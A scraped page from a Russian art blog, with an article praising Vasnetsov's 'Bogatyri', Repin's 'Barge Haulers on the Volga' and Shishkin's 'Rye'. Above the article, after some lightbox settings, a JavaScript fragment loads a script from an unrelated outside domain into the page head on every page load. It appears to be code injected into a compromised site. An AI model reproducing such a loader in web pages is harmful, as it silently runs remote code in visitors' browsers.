, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Картины русских художников

Автор: Дмитрий Алмазов | 09 Май 2013

БогатыриКак известно, Россия славится широтой души русского человека. Именно так всё прекрасное вложено в картины русских художников, где тонко передана культура народного быта. Загадочность и открытость, простота и изысканность – все это отечественные художники от чистого сердца вносили в свое творчество.

Одними из самых ярких узнаваемых картин русских мастеров, отражающих сказочную тематику, являются работы Виктора Васнецова. Он как никто другой умел показать все не обыкновение, загадку и величие русского эпоса, былин, сказок, истории. Безусловно, высшей точкой его творчества является полотно «Богатыри», которому художник посвятил около тридцати лет. На картине изображены три красивых, надежных, сильных витязя. Герои всем известных былин несут дозор, наблюдают, нет ли врагов, которые могут навредить земле Русской. Персонажи в доспехах и с оружием в руках олицетворяют мудрость, силу и удачу. В центре располагается полный сил величавый богатырь, Илья Муромец. Слева от него умный, опытный и со смекалкой Добрыня Никитич. По правую сторону от Ильи Муромца изображен Алёша Попович, который молод, весел и романтичен. Об этом свидетельствуют гусли, прикрепленные сзади к его седлу. Каждый богатырь держит в руках свой вид оружия, что символизирует их готовность сражаться с любым врагом. Васнецов изобразил шлемы богатырей формы, напоминающей церковные купола – и это неслучайно, данный элемент говорит не только о силе физической, но и духовной, религиозной. Былина о трех русских витязях относит зрителя ко времени, когда на Русь надвинулось монголо-татарское иго. Символичность данного полотна состоит в том, что оно гласит: на Руси всегда были герои, способные защитить родную землю, о чем свидетельствует уверенность и непоколебимость на лице каждого богатыря. Все они индивидуальны, но тем не менее, вместе герои представляют собой единое целое, непобедимую русскую силу.

Бурлаки на ВолгеНе менее шедевральным произведением русской живописи является картина Ильи Репина «Бурлаки на волге». В отличие от полотен Васнецова данная работа выполнена в стиле реализма. Картина создает впечатление, что действие происходит прямо перед глазами зрителя. Будто перед нами бурлаки, запряженные в лямки, тянут канаты, закрепленные на барже с грузом. Художественное полотно разделено линией горизонта пополам: в верхней части голубое облачное небо, а внизу глинястый желтый песок и мутная вода. На фоне этого пейзажа четко прорисованы образы бурлаков, тянущих судно вверх по реке. Зрителю показано большое усилие рабочих, так как двигать груз против течения совсем нелегко. Можно заметить, что одеты эти люди в лохмотья, поскольку под ремнем их одеяние быстро стирается и стареет, а лапти стоптаны от бесконечной дороги. Художник изобразил коллективную работу, где важен труд каждого и где нельзя переложить ответственность на другие плечи. Выполняя этот тяжелый непосильный труд, бурлаки невольно делались рабами, но несмотря на это, герои полотна не выглядят убогими. Эти люди демонстрируют свою сплоченность и справляются с тем, что другим не под силу. Живописец детально изучил лица этих людей, пообщавшись и увидев их лично. Несмотря на то, что на картине изображены конкретные люди, которые были знакомы художнику, эти герои показывают общий образ и характер русского народа.

Рожь картина Ивана ШишкинаЗвание гения пейзажа в русской живописи несомненно ассоциируется с Иваном Шишкиным, который умело передавал настроение природы и окружающего мира. Одной из известнейших и великих работ, проникнутой чувством покоя, признана «Рожь». Внимание зрителя в этой картине акцентировано на золотое поле с поспевшей рожью. Богатство русской земли символизируют спелые колосья под нежным дуновением ветра, которые уже готовы к сбору урожая. Сквозь тучные колосья можно разглядеть виднеющиеся васильки, которые придают своеобразие пейзажу. По обе стороны от извилистой дороги расположились могучие сосны. Картина показывает теплый летний денек, в изображении которого видна большая любовь к родному краю,  к его природе.

Картины русских художников написаны в разных стилях, в разных направлениях, но единая смысловая нить объединяла их творения. Каждый живописец воспевал русскую красоту, силу, уникальность, величие и гордился родным краем.

Темы: Изобразительное искусство, о Живописи | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress